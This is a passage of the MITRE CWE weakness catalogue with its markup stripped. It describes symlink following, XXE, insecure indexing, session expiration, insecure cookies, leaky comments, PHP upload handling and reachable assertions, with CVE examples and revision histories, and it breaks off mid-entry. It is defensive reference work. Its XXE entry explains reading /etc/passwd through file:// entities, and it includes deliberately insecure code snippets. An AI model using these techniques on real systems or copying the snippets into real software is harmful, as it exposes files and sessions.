+ Text editor follows symbolic links when creating a rescue copy during an abnormal exit, which allows local users to overwrite the files of other users. + https://www.cve.org/CVERecord?id=CVE-2000-1178 + + + CVE-2004-0217 + Antivirus update allows local users to create or append to arbitrary files via a symlink attack on a logfile. + https://www.cve.org/CVERecord?id=CVE-2004-0217 + + + CVE-2003-0517 + Symlink attack allows local users to overwrite files. + https://www.cve.org/CVERecord?id=CVE-2003-0517 + + + CVE-2004-0689 + Possible interesting example + https://www.cve.org/CVERecord?id=CVE-2004-0689 + + + CVE-2005-1879 + Second-order symlink vulnerabilities + https://www.cve.org/CVERecord?id=CVE-2005-1879 + + + CVE-2005-1880 + Second-order symlink vulnerabilities + https://www.cve.org/CVERecord?id=CVE-2005-1880 + + + CVE-2005-1916 + Symlink in Python program + https://www.cve.org/CVERecord?id=CVE-2005-1916 + + + CVE-2000-0972 + Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. + https://www.cve.org/CVERecord?id=CVE-2000-0972 + + + CVE-2005-0824 + Signal causes a dump that follows symlinks. + https://www.cve.org/CVERecord?id=CVE-2005-0824 + + + CVE-2015-3629 + A Libcontainer used in Docker Engine allows local users to escape containerization and write to an arbitrary file on the host system via a symlink attack in an image when respawning a container. + https://www.cve.org/CVERecord?id=CVE-2015-3629 + + + CVE-2020-26277 + In a MySQL database deployment tool, users may craft a maliciously packaged tarball that contains symlinks to files external to the target and once unpacked, will execute. + https://www.cve.org/CVERecord?id=CVE-2020-26277 + + + CVE-2021-21272 + "Zip Slip" vulnerability in Go-based Open Container Initiative (OCI) registries product allows writing arbitrary files outside intended directory via symbolic links or hard links in a gzipped tarball. + https://www.cve.org/CVERecord?id=CVE-2021-21272 + + + + + UNIX symbolic link following + + + + + + + + + + + + Allowed + This is a well-known Composite of multiple weaknesses that must all occur simultaneously, although it is attack-oriented in nature. + While attack-oriented composites are supported in CWE, they have not been a focus of research. There is a chance that future research or CWE scope clarifications will change or deprecate them. Perform root-cause analysis to determine which weaknesses allow symlink following to occur, and map to those weaknesses. For example, predictable file names might be intended functionality, but creation in a directory with insecure permissions might not. + + + + + + + Symlink vulnerabilities are regularly found in C and shell programs, but all programming languages can have this problem. Even shell programs are probably under-reported. + "Second-order symlink vulnerabilities" may exist in programs that invoke other programs that follow symlinks. They are rarely reported but are likely to be fairly common when process invocation is used [REF-493]. + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Other_Notes, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, References + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Modes_of_Introduction, Other_Notes + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere. + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This is a general class of weakness, but most research is focused on more specialized cases, such as path traversal (CWE-22) and symlink following (CWE-61). A symbolic link has a name; in general, it appears like any other file in the file system. However, the link includes a reference to another file, often in another directory - perhaps in another sphere of control. Many common library functions that accept filenames will "follow" a symbolic link and use the link's target instead. + The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 "Resource Injection," as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the "identifier used to access a system resource" such as a file name or port number, yet it explicitly states that the "resource injection" term does not apply to "path manipulation," which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer. + + + + Anonymous Tool Vendor (under NDA) + 2007-05-07 + Draft 6 + 2007-05-07 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Externally Controlled Reference to an Internal Resource + + + + The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. + + XML documents optionally contain a Document Type Definition (DTD), which, among other features, enables the definition of XML entities. It is possible to define an entity by providing a substitution string in the form of a URI. The XML parser can access the contents of this URI and embed these contents back into the XML document for further processing. + By submitting an XML file that defines an external entity with a file:// URI, an attacker can cause the processing application to read the contents of a local file. For example, a URI such as "file:///c:/winnt/win.ini" designates (in Windows) the file C:\Winnt\win.ini, or file:///etc/passwd designates the password file in Unix-based systems. Using URIs with other schemes such as http://, the attacker can force the application to make outgoing requests to servers that the attacker cannot reach directly, which can be used to bypass firewall restrictions or hide the source of attacks such as port scanning. + Once the content of the URI is read, it is fed back into the application that is processing the XML. This application may echo back the data (e.g. in an error message), thereby exposing the file contents. + + + + + + + + + + + + + XXE + An acronym used for the term "XML eXternal Entities" + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Read Application Data + Read Files or Directories + If the attacker is able to include a crafted DTD and a default entity resolver is enabled, the attacker may be able to access arbitrary files on the system. + + + Integrity + Bypass Protection Mechanism + The DTD may include arbitrary HTTP requests that the server may execute. This could lead to other attacks leveraging the server's trust relationship with other entities. + + + Availability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + The product could consume excessive CPU cycles or memory using a URI that points to a large file, or a device that always returns data such as /dev/random. Alternately, the URI could reference a file that contains many nested or recursive entity references to further slow down parsing. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + System Configuration + Many XML parsers and validators can be configured to disable external entity expansion. + + + + + CVE-2005-1306 + A browser control can allow remote attackers to determine the existence of files via Javascript containing XML script. + https://www.cve.org/CVERecord?id=CVE-2005-1306 + + + CVE-2012-5656 + XXE during SVG image conversion + https://www.cve.org/CVERecord?id=CVE-2012-5656 + + + CVE-2012-2239 + XXE in PHP application allows reading the application's configuration file. + https://www.cve.org/CVERecord?id=CVE-2012-2239 + + + CVE-2012-3489 + XXE in database server + https://www.cve.org/CVERecord?id=CVE-2012-3489 + + + CVE-2012-4399 + XXE in rapid web application development framework allows reading arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2012-4399 + + + CVE-2012-3363 + XXE via XML-RPC request. + https://www.cve.org/CVERecord?id=CVE-2012-3363 + + + CVE-2012-0037 + XXE in office document product using RDF. + https://www.cve.org/CVERecord?id=CVE-2012-0037 + + + CVE-2011-4107 + XXE in web-based administration tool for database. + https://www.cve.org/CVERecord?id=CVE-2011-4107 + + + CVE-2010-3322 + XXE in product that performs large-scale data analysis. + https://www.cve.org/CVERecord?id=CVE-2010-3322 + + + CVE-2009-1699 + XXE in XSL stylesheet functionality in a common library used by some web browsers. + https://www.cve.org/CVERecord?id=CVE-2009-1699 + + + + + 43 + XML External Entities + + + SFP24 + Tainted input to command + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + CWE-918 (SSRF) and CWE-611 (XXE) are closely related, because they both involve web-related technologies and can launch outbound requests to unexpected destinations. However, XXE can be performed client-side, or in other contexts in which the software is not acting directly as a server, so the "Server" portion of the SSRF acronym does not necessarily apply. + + + + Anonymous Tool Vendor (under NDA) + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-09-27 + updated Background_Details, Other_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships, Relevant_Properties + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Name, Type + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Alternate_Terms, Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through XML External Entity File Disclosure + Information Exposure Through XML External Entity Reference + Improper Restriction of XML External Entity Reference ('XXE') + + + + The product creates a search index of private or sensitive documents, but it does not properly limit index access to actors who are authorized to see the original information. + Web sites and other document repositories may apply an indexing routine against a group of private documents to facilitate search. If the index's results are available to parties who do not have access to the documents being indexed, then attackers could obtain portions of the documents by conducting targeted searches and reading the results. The risk is especially dangerous if search results include surrounding text that was not part of the search query. This issue can appear in search engines that are not configured (or implemented) to ignore critical files that should remain hidden; even without permissions to download these files directly, the remote user could read them. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + 48 + Insecure Indexing + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This weakness is probably under-studied and under-reported. + + + + Anonymous Tool Vendor (under NDA) + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Research_Gaps + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, References, Relationships, Type + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Insecure Indexing + Information Leak Through Indexing of Private Data + Information Exposure Through Indexing of Private Data + + + + According to WASC, "Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization." + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Set sessions/credentials expiration date. + + + + + The following snippet was taken from a J2EE web.xml deployment descriptor in which the session-timeout parameter is explicitly defined (the default value depends on the container). In this case the value is set to -1, which means that a session will never expire. + + <web-app> + [...snipped...] + <session-config><session-timeout>-1</session-timeout></session-config> + </web-app> + + + + + + 47 + Insufficient Session Expiration + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The lack of proper session expiration may improve the likely success of certain attacks. For example, an attacker may intercept a session ID, possibly via a network sniffer or Cross-site Scripting attack. Although short session expiration times do not help if a stolen token is immediately used, they will protect against ongoing replaying of the session ID. In another scenario, a user might access a web site from a shared computer (such as at a library, Internet cafe, or open work environment). Insufficient Session Expiration could allow an attacker to use the browser's back button to access web pages previously accessed by the victim. + + + + WASC + 2007-05-07 + Draft 6 + 2007-05-07 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-09-27 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the user agent to send those cookies in plaintext over an HTTP session. + + + + + + + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Always set the secure attribute when the cookie should sent via HTTPS only. + + + + + The snippet of code below, taken from a servlet doPost() method, sets an accountID cookie (sensitive) without calling setSecure(true). + + Cookie c = new Cookie(ACCOUNT_ID, acctID);response.addCookie(c); + + + + + + CVE-2004-0462 + A product does not set the Secure attribute for sensitive cookies in HTTPS sessions, which could cause the user agent to send those cookies in plaintext over an HTTP session with the product. + https://www.cve.org/CVERecord?id=CVE-2004-0462 + + + CVE-2008-3663 + A product does not set the secure flag for the session cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie. + https://www.cve.org/CVERecord?id=CVE-2008-3663 + + + CVE-2008-3662 + A product does not set the secure flag for the session cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie. + https://www.cve.org/CVERecord?id=CVE-2008-3662 + + + CVE-2008-0128 + A product does not set the secure flag for a cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie. + https://www.cve.org/CVERecord?id=CVE-2008-0128 + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2007-05-07 + Draft 6 + 2007-05-07 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-03-10 + updated Name + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unset Secure Attribute for Sensitive Cookies in HTTPS Session + + + + While adding general comments is very useful, some programmers tend to leave important data, such as: filenames related to the web application, old links or links which were not meant to be browsed by users, old code fragments, etc. + An attacker who finds these comments can map the application's structure and files, expose hidden parts of the site, and study the fragments of code to reverse engineer the application, which may help develop further attacks against the site. + + + + + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Distribution + Remove comments which have sensitive information about the design/implementation of the application. Some of the comments may be exposed to the user and affect the security posture of the application. + + + + + The following comment, embedded in a JSP, will be displayed in the resulting HTML output. + + <!-- FIXME: calling this with more than 30 args kills the JDBC server --> + + + + + + CVE-2007-6197 + Version numbers and internal hostnames leaked in HTML comments. + https://www.cve.org/CVERecord?id=CVE-2007-6197 + + + CVE-2007-4072 + CMS places full pathname of server in HTML comment. + https://www.cve.org/CVERecord?id=CVE-2007-4072 + + + CVE-2009-2431 + blog software leaks real username in HTML comment. + https://www.cve.org/CVERecord?id=CVE-2009-2431 + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2007-05-07 + Draft 6 + 2007-05-07 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Observed_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Comments + Information Exposure Through Comments + + + + The PHP application uses an old method for processing uploaded files by referencing the four global variables that are set for each file (e.g. $varname, $varname_size, $varname_name, $varname_type). These variables could be overwritten by attackers, causing the application to process unauthorized files. + These global variables could be overwritten by POST requests, cookies, or other methods of populating or overwriting these variables. This could be used to read or process arbitrary files by providing values such as "/etc/passwd". + + + + + + + Primary + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Architecture and Design + Use PHP 4 or later. + + + Architecture and Design + If you must support older PHP versions, write your own version of is_uploaded_file() and run it against $HTTP_POST_FILES['userfile'])) + + + Implementation + For later PHP versions, reference uploaded files using the $HTTP_POST_FILES or $_FILES variables, and use is_uploaded_file() or move_uploaded_file() to ensure that you are dealing with an uploaded file. + + + + + As of 2006, the "four globals" method is probably in sharp decline, but older PHP applications could have this issue. + In the "four globals" method, PHP sets the following 4 global variables (where "varname" is application-dependent): + + $varname = name of the temporary file on local machine$varname_size = size of file$varname_name = original name of file provided by client$varname_type = MIME type of the file + + + + "The global $_FILES exists as of PHP 4.1.0 (Use $HTTP_POST_FILES instead if using an earlier version). These arrays will contain all the uploaded file information." + + $_FILES['userfile']['name'] - original filename from client$_FILES['userfile']['tmp_name'] - the temp filename of the file on the server + + ** note: 'userfile' is the field name from the web form; this can vary. + + + + + CVE-2002-1460 + Forum does not properly verify whether a file was uploaded or if the associated variables were set by POST, allowing remote attackers to read arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2002-1460 + + + CVE-2002-1759 + Product doesn't check if the variables for an upload were set by uploading the file, or other methods such as $_POST. + https://www.cve.org/CVERecord?id=CVE-2002-1759 + + + CVE-2002-1710 + Product does not distinguish uploaded file from other files. + https://www.cve.org/CVERecord?id=CVE-2002-1710 + + + + + Incomplete Identification of Uploaded File Variables (PHP) + + + SFP25 + Tainted input to variable + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary. + + While assertion is good for catching logic errors and reducing the chances of reaching more serious vulnerability conditions, it can still lead to a denial of service. + For example, if a server handles multiple simultaneous connections, and an assert() occurs in one single connection that causes all other connections to be dropped, this is a reachable assertion that leads to a denial of service. + + + + + + + + Resultant + + + + + assertion failure + + + + + Implementation + + + + + Availability + DoS: Crash, Exit, or Restart + An attacker that can trigger an assert statement can still lead to a denial of service if the relevant code can be triggered by an attacker, and if the scope of the assert() extends beyond the attacker's own session. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Make sensitive open/close operation non reachable by directly user-controlled data (e.g. open/close resources) + + + Implementation + Input Validation + Perform input validation on user data. + + + + + In the excerpt below, an AssertionError (an unchecked exception) is thrown if the user hasn't entered an email address in an HTML form. + + String email = request.getParameter("email_address");assert email != null; + + + + + + CVE-2006-6767 + FTP server allows remote attackers to cause a denial of service (daemon abort) via crafted commands which trigger an assertion failure. + https://www.cve.org/CVERecord?id=CVE-2006-6767 + + + CVE-2006-6811 + Chat client allows remote attackers to cause a denial of service (crash) via a long message string when connecting to a server, which causes an assertion failure. + https://www.cve.org/CVERecord?id=CVE-2006-6811 + + + CVE-2006-5779 + Product allows remote attackers to cause a denial of service (daemon crash) via LDAP BIND requests with long authcid names, which triggers an assertion failure. + https://www.cve.org/CVERecord?id=CVE-2006-5779 + + + CVE-2006-4095 + Product allows remote attackers to cause a denial of service (crash) via certain queries, which cause an assertion failure. + https://www.cve.org/CVERecord?id=CVE-2006-4095 + + + CVE-2006-4574 + Chain: security monitoring product has an off-by-one error that leads to unexpected length values, triggering an assertion. + https://www.cve.org/CVERecord?id=CVE-2006-4574 + + + + + MET01-J + Never use assertions to validate method arguments + + + SFP3 + Use of an improper API + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Observed_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Common_Consequences, Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2019-09-19 + updated Alternate_Terms + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + An ActiveX control is intended for use in a web browser, but it exposes dangerous methods that perform actions that are outside of the browser's security model (e.g. the zone or domain). + ActiveX controls can exercise far greater control over the operating system than typical Java or javascript. Exposed methods can be subject to various vulnerabilities, depending on the implemented behaviors of those methods, and whether input validation is performed on the provided arguments. If there is no integrity checking or origin validation, this method could be invoked by attackers. + + + + + + Primary + + + + + Architecture and Design + + + Implementation + + + + + Other + Other + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect 